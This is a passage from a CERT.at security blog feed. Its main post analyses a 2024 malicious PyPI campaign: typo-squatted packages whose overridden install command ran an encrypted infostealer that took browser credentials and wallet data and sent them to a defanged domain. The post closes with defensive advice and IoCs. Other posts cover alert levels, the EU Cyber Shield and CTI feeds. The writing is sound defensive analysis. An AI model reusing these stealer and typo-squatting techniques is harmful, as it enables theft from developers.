&lt;li&gt;Border controls in the Schengen zone after the migration wave of 2015&lt;/li&gt;&#13;
&lt;li&gt;Coming down from the pandemic emergency&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;That&amp;rsquo;s why I&amp;rsquo;ve always been pushing for clear de-escalation rules to be in place whenever we do raise the alarm level.&lt;/p&gt;&#13;
&lt;h2&gt;Cost of escalation&lt;/h2&gt;&#13;
&lt;p&gt;For threat levels to make sense, any level above &amp;ldquo;green&amp;rdquo; need to include a clear guidance what the recipient of the warning should be doing at this threat level. In the example I saw, there was a lot of &amp;ldquo;Identify and patch vulnerable systems&amp;rdquo;. Well, D'oh! This is what you should be doing at level green, too.&lt;/p&gt;&#13;
&lt;p&gt;Thus, relevant guidance at higher level needs to be more than &amp;ldquo;protect your systems and prepare for attacks&amp;rdquo;. That&amp;rsquo;s a standing order for anyone doing IT operation, this is useless advice. What people need to know is what costs they should be paying in exchange for a better preparation against the current threat.&lt;/p&gt;&#13;
&lt;p&gt;This could be a simple thing like &amp;ldquo;We expect a patch for a relevant system to be released out of our office-hours tonight, we need to have a team on standby to react as quickly as possible, and we&amp;rsquo;ve willing to pay for the overtime work to have the patch deployed ASAP&amp;rdquo;. Or the advice could be &amp;ldquo;You need to patch this outside your regular patching cadence, plan for a business disruption and/or night shifts for the IT people&amp;rdquo;. At the extreme end, it might even be &amp;ldquo;we&amp;rsquo;re taking service X out of production, the changes to the risk equation mean that its benefits can&amp;rsquo;t justify the increased risks anymore&amp;rdquo;.&lt;/p&gt;&#13;
&lt;p&gt;To summarize: if there were no hard costs to a preventative security measure, then you should have implemented them a long time ago, regardless of any threat level board.&lt;/p&gt;&#13;
&lt;h2&gt;Counterpoint&lt;/h2&gt;&#13;
&lt;p&gt;There is definitely value in categorizing a &lt;em&gt;specific&lt;/em&gt; incident or vulnerability in some sort of threat level scheme: A particularly bad patch day, or some out-of-band patch release by an important vendor certainly is a good reason that the response to the threat should also be more than business as usual.&lt;/p&gt;&#13;
&lt;p&gt;But a generic threat level increase without concrete vulnerabilities listed or TTPs to guard against? That&amp;rsquo;s just a fancy way of saying &amp;ldquo;be afraid&amp;rdquo; and there is little benefit in that.&lt;/p&gt;&#13;
&lt;p&gt;&lt;strong&gt;Postscript:&lt;/strong&gt; Just after posting this article, I stumbled on a &lt;a href=&quot;https://things.uk/@eclectech/112195378556075301&quot;&gt;fediverse post&lt;/a&gt; making almost the same argument, just with April 1st vs. the everyday flood of misinformation.&lt;/p&gt;</description><pubDate>Tue, 02 Apr 2024 13:57:46 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2024/4/on-cybersecurity-alert-levels</guid><dc:creator>CERT.at</dc:creator><dc:date>2024-04-02T13:57:46Z</dc:date></item><item><title>Hobby hunter notes: PyPI under attack</title><link>https://www.cert.at/en/blog/2024/3/hobby-hunter-notes-pypi-under-attack</link><description>&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;When I wrap up at CERT.at, where I mostly work on our notification system (if you&amp;rsquo;re a network operator in Austria and got a misassigned notification about some security issues &amp;ndash; I might have been involved in that), I sometimes change my hat and explore other &amp;ldquo;cyber&amp;rdquo;-security areas, especially looking for malicious packages in PyPI, a standard Python package repository. The short summary is: there are a lot of them &amp;ndash; but also, don&amp;rsquo;t panic.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;It&amp;rsquo;s happening now&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Let&amp;rsquo;s start with a rough analysis of a recent campaign that could be named &amp;ldquo;funcaptcha.&amp;rdquo; According to records I was able to access, it started the day before yesterday (26th March) with a package called &amp;ldquo;schubismomv3&amp;rdquo;, but a post on Twitter [0] suggests there might have already been more by the time this gained my attention.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;As per my findings, the first version of the package was published around 18:00 on March&amp;nbsp;26th (all timestamps are UTC+1), starting&amp;nbsp;without any active malicious content, but included hate speech and used the name of a well-known security researcher [0].&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240328/Screenshot%20from%202024-03-27%2009-55-18%20%28copy%29.png&quot; alt=&quot;A sample from first version of &amp;ldquo;schubismomv3&amp;rdquo; package&quot; width=&quot;540&quot; height=&quot;402&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;A sample from first version of &amp;ldquo;schubismomv3&amp;rdquo; package&lt;br /&gt;&lt;/em&gt;&lt;/div&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Over multiple iterations with an apparently &amp;ldquo;trial and error&amp;rdquo; approach (Have you heard about testing your software locally? Or a test environment? No? Sorry, I might be biased. I&amp;rsquo;m primarily a developer.) we ended up with version 1.10.0 published around 20:30. It used classic methods:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;the setup.py script was configured with a custom installation command overriding the default&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;during the installation on Windows OS, a sub process was started with an encrypted script inside&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;the malicious script used the &amp;ldquo;Fernet&amp;rdquo; encryption library to avoid automated de-obfuscation.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240328/Screenshot%20from%202024-03-27%2009-57-46.png&quot; alt=&quot;Final version of &amp;ldquo;schubismomv3&amp;rdquo; &amp;ndash; overriding the installation command&quot; width=&quot;1000&quot; height=&quot;198&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;Final version of &amp;ldquo;schubismomv3&amp;rdquo; &amp;ndash; overriding the installation command&lt;/em&gt;&lt;/div&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The obfuscated code performed a &amp;nbsp;number of tasks typical for information stealers, such as exfiltrating cookies and passwords from web browsers, but also looked for browser extensions and applications related to cryptocurrencies, documents with names indicating that they contained secret information (Do you name your top-secret documents something like &amp;ldquo;seecret&amp;rdquo;?) and so on. All this information is then compressed and sent out to &amp;ldquo;funcaptcha[.]ru/delivery&amp;rdquo; (thus the name for the campaign). Afterwards, an interesting thing would happen: if the script detected an installation of Atomic Wallet [1], a cryptocurrency wallet app, it downloaded its own version, trying to replace the original. Finally, the next Python script was downloaded and put in the Windows start up directory.&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240328/Screenshot%20from%202024-03-27%2010-50-11.png&quot; alt=&quot;A sample from de-obfuscated code attempting to replace the original app&quot; width=&quot;645&quot; height=&quot;400&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;A sample from de-obfuscated code attempting to replace the original app&lt;/em&gt;&lt;/div&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I'll leave the deep analysis of these artifacts to others. Let's take a look at why this is a campaign, and&amp;nbsp;not just a single malicious package, instead. As soon as &amp;ldquo;schubismomv3&amp;rdquo; was reported and removed (shortly after 21:00, according to the information&amp;nbsp;I was able to gather), PyPI was flooded with similar packages, all displaying the same malicious activity.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Initially, the threat actor used not exactly marketing friendly names, such as &amp;ldquo;insanepackagev1434&amp;rdquo; or &amp;ldquo;insanepackage217234234242423442983&amp;rdquo;. But later on they began to attempt to &amp;ldquo;typo-squat&amp;rdquo; popular packages, by creating and uploading packages which closely &amp;ndash; but not exactly &amp;ndash; mirrored the names of popular ones.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;A few examples were &amp;ldquo;reqzests&amp;rdquo;, &amp;ldquo;requetsa&amp;rdquo;, &amp;ldquo;py-cordd&amp;rdquo;, &amp;ldquo;py-coqrd&amp;rdquo;, &amp;ldquo;coloramza&amp;rdquo;, &amp;ldquo;corlorama&amp;rdquo;, &amp;ldquo;capmonstercloudclouidclient&amp;rdquo;, &amp;ldquo;piolow&amp;rdquo;, &amp;ldquo;bop-utils&amp;rdquo;, and many hundreds (!) more.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The campaign continued until the early hours of March 28th, when PyPI administrators took the decision to temporarily suspend registration of new users and projects [14]. By then, more than 500 packages had been created.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;They are not alone&amp;hellip;&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Looking at the few months I spent looking at PyPI, I can confidently say that the &amp;ldquo;funcaptcha&amp;rdquo; campaign might have been an exception in terms of the number of malicious packages involed &amp;ndash; but it was not the only one.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I observed a number of potentially malicious packages, with another recent case, &amp;ldquo;yocolor&amp;rdquo;, initially looking like a small thing on PyPI, but turning out to be a significantly bigger campaign targeting repositories on Github [2] [3].&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;A further number of suspicious packages didn't do anything harmful, but weren't what you wanted to get either &amp;ndash; some were pentesting packages (they usually get removed very quickly), some were advertisements, some may be part of research efforts.&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240328/curl-stat-example.png&quot; alt=&quot;Example command extracted from a package that is not harmful on its own, but you probably didn't want to share all of it&quot; width=&quot;1000&quot; height=&quot;76&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;Example command extracted from a package that is not harmful on its own, but you probably didn't want to share all of it&lt;/em&gt;&lt;/div&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;...but it&amp;rsquo;s also no reason to panic&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Everything I have written about is disturbing, but comparatively simple to catch. The methods are so popular (and obvious) that it's somewhat confusing to me. The threat actors must be aware that the chances of successfully compromising an actual, real world systems are slim to negligible. The reasonably expectable return on investment is far outweighed by the effort the attackers have put into these campaigns.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The &quot;funcaptcha&quot; campaign is a good example - yes, their code contains functionality to exfiltrate data, as well as some more advanced techniques. But the initial infection vector &amp;ndash; assuming that there aren't any further, undiscovered ones &amp;ndash; exposes packages to quick detection and swift removal.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Overriding the default install command is one of the first things that is being checked when a package is examined, and an external connection during installation is a pretty suspicious activity (although often a legitimate behavior).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The attackers seemed to know all of this and didn't attempt to hide it &amp;ndash; which is odd,&amp;nbsp;unless the campaign was just a smokescreen. The first step was slightly modified in later packages, downloading the first malicious script from their domain instead of embedding it, and recording the name of the package.&lt;/p&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20240328/Screenshot%20from%202024-03-27%2011-46-58.png&quot; alt=&quot;Example description of packages released in later stages of the &amp;ldquo;funcaptcha&amp;rdquo; campaign &amp;ndash; it was what you would see in PyPI. I hope you wouldn't try to install such a package.&quot; width=&quot;1000&quot; height=&quot;50&quot; /&gt;&lt;/div&gt;&#13;
&lt;div class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;Example description of packages released in later stages of the &amp;ldquo;funcaptcha&amp;rdquo; campaign &amp;ndash; it was what you would see in PyPI. I hope you wouldn't try to install such a package.&lt;/em&gt;&lt;/div&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;PyPI Security Team&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The big role in securing your development environment against such attacks is played by PyPI. After a few attempts, the index decided against proactively hunting for malware years ago,&amp;nbsp;instead investing in&amp;nbsp;improving the handling of abuse reports.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;And they do it well. The team responds very quickly, sometimes taking down malicious packages in a matter of minutes. Last year, PyPI reached an important milestone by hiring its first official Safety &amp;amp; Security Engineer [4].&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;They are active and transparent about their work, conducting a security audit of the registry [5], explaining the abuse reporting process [6], and most recently improving the reporting channel, as well as launching a private beta of the reporting API [7].&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This means that the PyPI, while under constant attack from threat actors, is leveraging the power of many researchers hunting for malicious packages. And it seems to work well, at least against threat actors using known methods.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;What does all of this mean for me?&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;My personal opinion is that most of the cases we see in the security media and researchers' blog posts about malicious packages aren't the real threats we should be spending sleepless nights thinking about&amp;nbsp;&amp;ndash; we can leave that restlessness to advanced threats like backdoors in popular libraries, well hidden malicious actions which are only&amp;nbsp;triggered under very specific conditions, and so on.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The typical threats&amp;nbsp;relying on obvious methods are more like the flu: we cannot ignore them, but we should get used to them and, most importantly, take basic precautions.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;These always depend on what you're trying to secure &amp;ndash; don't forget to think about your threat modeling, even if it's basic!&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;There are a few tips, useful not only for Python environments:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Do. Not. Download. Random. Stuff. Really, that&amp;rsquo;s the most important thing. Malicious code is often hidden in low-quality packages, repositories in Github, and so on. Please pay attention to what you run on your computer.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Use reputable dependencies. But be careful: the information in package registries, such as connected repositories or maintenance names, is often just a declaration. Instead, use external reputation services. There are a few free ones you can check (for example [8] [9]), as well as services that offer only verified dependencies for download.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Keep your dependencies healthy. Scan them regularly for known vulnerabilities (including container images), and install security updates (not necessarily fully automated &amp;ndash; that would open the door to other threats). You can use free or paid services, and your source hosting service probably already has something ready for painless integration. For example, you can check out osv.dev&amp;nbsp;[10].&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Install only&amp;nbsp;what you need. You can think of your project's dependencies as an ingredient list: if the food&amp;nbsp;item&amp;nbsp;or beverage you're about to buy has a long list of ingredients you don't understand, you should probably think twice before eating it. Dependencies that you don't need, dependencies that have been used but are no longer used &amp;ndash; all of those unnecessarily increase the risk of an incident.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Think about reducing the data that your development environment has access to. Thread actors use malicious packages and repositories to target data on developer machines. Solutions such as development&amp;nbsp;containers [11] can reduce the potential scope of a breach.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Monitor test environments&amp;nbsp;the same way&amp;nbsp;as you would production. Advanced threats may not be easy to detect locally, but there is a chance that they will reveal their intentions in your test environments before they reach production. Monitoring outgoing connections can be helpful in catching them. Also: you probably also want to secure your test environments as production if they are accessed externally [12], and not leave your production data there, especially of former customers [13].&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Stay safe&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I started by explaining a case from the PyPI world, but that was just an example. Developing software means relying on external dependencies, and it's great that we share common parts, especially when implementing complex solutions (Don't implement your own cryptography. Just don't.). Like everything, it brings its own risks, and we just have to be aware of them. And take precautions. And do not download random stuff.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;IoCs&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;You can look for signs of &amp;ldquo;funcaptcha&amp;rdquo; by:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;funcaptcha[.]ru&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;0c1ddd33e630f4ac684880f0e673dfa84919272494c11da0f1ec05fb4f919ce8 &amp;ndash; first of modified apps the script tried to inject&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;abe19b0964daf24cd82c6db59212fd7a61c4c8335dd4a32b8e55c7c05c17220d &amp;ndash; second modified app&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;References&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[0] &lt;a href=&quot;https://x.com/_JohnHammond/status/1772704618574705057?s=20&quot;&gt;https://x.com/_JohnHammond/status/1772704618574705057?s=20&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[1] &lt;a href=&quot;https://atomicwallet.io/&quot;&gt;https://atomicwallet.io/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[2] &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/hackers-poison-source-code-from-largest-discord-bot-platform/&quot;&gt;https://www.bleepingcomputer.com/news/security/hackers-poison-source-code-from-largest-discord-bot-platform/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[3] &lt;a href=&quot;https://medium.com/@demonia/discovering-malwares-in-public-github-repositories-3e080f030ecc&quot;&gt;https://medium.com/@demonia/discovering-malwares-in-public-github-repositories-3e080f030ecc&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[4] &lt;a href=&quot;https://blog.pypi.org/posts/2023-08-04-pypi-hires-safety-engineer/&quot;&gt;https://blog.pypi.org/posts/2023-08-04-pypi-hires-safety-engineer/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[5] &lt;a href=&quot;https://blog.pypi.org/posts/2023-11-14-1-pypi-completes-first-security-audit/&quot;&gt;https://blog.pypi.org/posts/2023-11-14-1-pypi-completes-first-security-audit/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[6] &lt;a href=&quot;https://blog.pypi.org/posts/2023-09-18-inbound-malware-reporting/&quot;&gt;https://blog.pypi.org/posts/2023-09-18-inbound-malware-reporting/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[7] &lt;a href=&quot;https://blog.pypi.org/posts/2024-03-06-malware-reporting-evolved/&quot;&gt;https://blog.pypi.org/posts/2024-03-06-malware-reporting-evolved/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[8] &lt;a href=&quot;https://deps.dev/&quot;&gt;https://deps.dev/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[9] &lt;a href=&quot;https://securityscorecards.dev/&quot;&gt;https://securityscorecards.dev/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[10]&amp;nbsp; &lt;a href=&quot;https://osv.dev/&quot;&gt;https://osv.dev/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[11] &lt;a href=&quot;https://containers.dev/&quot;&gt;https://containers.dev/&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[12] &lt;a href=&quot;https://www.theverge.com/2024/1/26/24051708/microsoft-hack-russian-security-attack-senior-leadership-emails&quot;&gt;https://www.theverge.com/2024/1/26/24051708/microsoft-hack-russian-security-attack-senior-leadership-emails&lt;/a&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;[13] &lt;a href=&quot;https://niebezpiecznik.pl/post/dcg-centrum-medyczne-pokazuje-jak-nie-informowac-o-kradziezy-danych-pacjentow/&quot;&gt;https://niebezpiecznik.pl/post/dcg-centrum-medyczne-pokazuje-jak-nie-informowac-o-kradziezy-danych-pacjentow/&lt;/a&gt;&amp;nbsp; (Polish &amp;ndash; data of a medical clinic stolen from the test environment of a vendor they have not worked with for a few years)&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;[14] &lt;a href=&quot;https://status.python.org/incidents/dc9zsqzrs0bv&quot;&gt;https://status.python.org/incidents/dc9zsqzrs0bv&lt;/a&gt;&amp;nbsp;&lt;/p&gt;</description><pubDate>Thu, 28 Mar 2024 15:16:01 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2024/3/hobby-hunter-notes-pypi-under-attack</guid><dc:creator>CERT.at</dc:creator><dc:date>2024-03-28T15:16:01Z</dc:date></item><item><title>The European Cyber Shield</title><link>https://www.cert.at/en/blog/2023/9/european-cyber-shield</link><description>&lt;p class=&quot;block&quot;&gt;The EU has been pushing the concept of the &quot;European Cyber Shield&quot; within the Digital Europe Programme as well as with the proposed &quot;Cyber Solidarity Act&quot;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;After a presentation on this topic at the CSIRTs Network meeting in June, I've written a long-form paper to lay out my thinking on this topic.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Executive Summary&lt;/h2&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The proposed Cyber Shield (Chapter 2 Cyber Solidarity Act) contains valid ideas: supporting SOCs by fostering national and cross-border collaboration is worth doing.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;An unfortunate choice of terminology is prone to confuse readers of the Act. A change would be welcomed.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The relationship between the proposed structures and the tasks of the CSIRTs and the CSIRTs network (as stipulated in the NIS2 Directive) is not entirely clear. Defining this relationship and integrating the proposed roles with the existing structures would be useful.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;EU funding for multiple consortia with the aim of building closer, technical collaborations in cross-border structures is a sound investment.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The full paper is available &lt;a class=&quot;pdf&quot; href=&quot;https://www.cert.at/media/files/downloads/papers/2309/2023-09-12-european-cyber-shield.pdf&quot;&gt;here&lt;/a&gt; or from our &lt;a href=&quot;https://cert.at/en/downloads/papers/&quot;&gt;Download/Papers page&lt;/a&gt;.&lt;/p&gt;</description><pubDate>Tue, 12 Sep 2023 10:18:45 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2023/9/european-cyber-shield</guid><dc:creator>CERT.at</dc:creator><dc:date>2023-09-12T10:18:45Z</dc:date></item><item><title>A classification of CTI Data feeds</title><link>https://www.cert.at/en/blog/2023/9/cti-data-feeds</link><description>&lt;p class=&quot;block&quot;&gt;We at CERT.at process and share a wide selection of cyber threat intelligence (CTI) as part of our core mission as Austria&amp;rsquo;s hub for IT security information. Right now, we are involved in two projects that involve the purchase of commercial CTI. I encountered some varying views on what CTI is and what one should do with the indicators of compromise (IoCs) that are part of a CTI feed.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post describes my view on this topic.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Context&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The &lt;a href=&quot;https://ccb.belgium.be/en/enisa-launches-pilot-project-emergency-measures&quot;&gt;EU decided in March 2022&lt;/a&gt; to create a &lt;a href=&quot;https://www.enisa.europa.eu/publications/cybersecurity-support-action&quot;&gt;cybersecurity emergency response fund&lt;/a&gt; with which &lt;a href=&quot;https://etendering.ted.europa.eu/cft/cft-display.html?cftId=11918&quot;&gt;ENISA can purchase&lt;/a&gt; support services for the NIS entities in the member states.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Austria is also taking part in a project that stems from the DEP call &lt;a href=&quot;https://ec.europa.eu/info/funding-tenders/opportunities/portal/screen/opportunities/topic-details/digital-eccc-2022-cyber-03-soc&quot;&gt;DIGITAL-ECCC-2022-CYBER-03&lt;/a&gt; in combination with a &lt;a href=&quot;https://digital-strategy.ec.europa.eu/en/news/cybersecurity-eu-launches-first-phase-deployment-european-infrastructure-cross-border-security&quot;&gt;joint procurement with the ECCC&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Layers of CTI&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;One way to structure and classify CTI feeds is to look at the abstraction level at which they operate. As &lt;a href=&quot;https://en.wikipedia.org/wiki/Cyber_threat_intelligence&quot;&gt;Wikipedia&lt;/a&gt; puts it:&amp;nbsp;&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Tactical&lt;/strong&gt;: Typically used to help identify threat actors (TAs). Indicators of compromise (such as IP addresses, Internet domains or hashes) are used and the analysis of tactics, techniques and procedures (TTP) used by cybercriminals is beginning to be deepened. Insights generated at the tactical level will help security teams predict upcoming attacks and identify them at the earliest possible stages.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Operational&lt;/strong&gt;: This is the most technical level of threat intelligence. It shares hard and specific details about attacks, motivation, threat actor capabilities, and individual campaigns. Insights provided by threat intelligence experts at this level include the nature, intent, and timing of emerging threats. This type of information is more difficult to obtain and is most often collected through deep, obscure web forums that internal teams cannot access. Security and attack response teams are the ones that use this type of operational intelligence.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Strategic&lt;/strong&gt;: Usually tailored to non-technical audiences, intelligence on general risks associated with cyberthreats. The goal is to deliver, in the form of white papers and reports, a detailed analysis of current and projected future risks to the business, as well as the potential consequences of threats to help leaders prioritize their responses.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;With tactical CTI, there a reasonable chance that it can shared on a machine-to-machine basis with full semantic information that makes it possible to automate the processing for detection and prevention purposes. Many commercial security devices are sold with a subscription to the vendor&amp;rsquo;s own data-feeds. This ranges from simple anti-spam solutions, over filters for web proxies to rules for SIEMs.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;While it is possible to encode operational CTI in standardized data exchange formats like STIX2, it is much harder for automated systems to operationalize this information. For example, what automated technical reaction is possible to &amp;ldquo;threat actor X is now using compromised&amp;nbsp;&lt;a href=&quot;https://en.wikipedia.org/wiki/Customer-premises_equipment&quot;&gt;CPEs&lt;/a&gt; in the country of its targets for C2 communication&amp;rdquo;? Yes, one can store that kind of information in&amp;nbsp;&lt;a href=&quot;https://github.com/OpenCTI-Platform/opencti&quot;&gt;OpenCTI&lt;/a&gt; (or a similar Threat Intelligence Platform (TIP)) and map it to the &lt;a href=&quot;https://attack.mitre.org/&quot;&gt;ATT&amp;amp;CK framework&lt;/a&gt;. That can be valuable for the human expert to plan defenses or to react better during incidents, but it is not detailed enough for automated defense.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;With strategic CTI, we are on the human management layer. This is never designed for automated processing by machines.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Types of IOCs&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Focusing on the &lt;strong&gt;technical layer&lt;/strong&gt;, we find that there are a number of different types of information encoded in the data feeds. One way to look at this is the &lt;a href=&quot;https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf&quot;&gt;Diamond Model of intrusion analysis&lt;/a&gt; which is built around information on adversary, capability, infrastructure, and victim. While this is a very valuable model for intrusion analysis, it is too complex for a simple categorization of CTI feeds.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I propose the following three basic types:&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Type 1: Attack Surface Information&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Many of the feeds from Shadowserver fall in this category. Shodan data can also be a good example. There is now a&amp;nbsp;&lt;a href=&quot;https://en.wikipedia.org/wiki/Cybersecurity_rating#Security_Rating_Services&quot;&gt;bunch of companies&lt;/a&gt; focusing on &amp;ldquo;cyber risk rating&amp;rdquo;, which all try to evaluate the internet-visible infrastructure of organizations.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Examples&lt;/strong&gt;:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
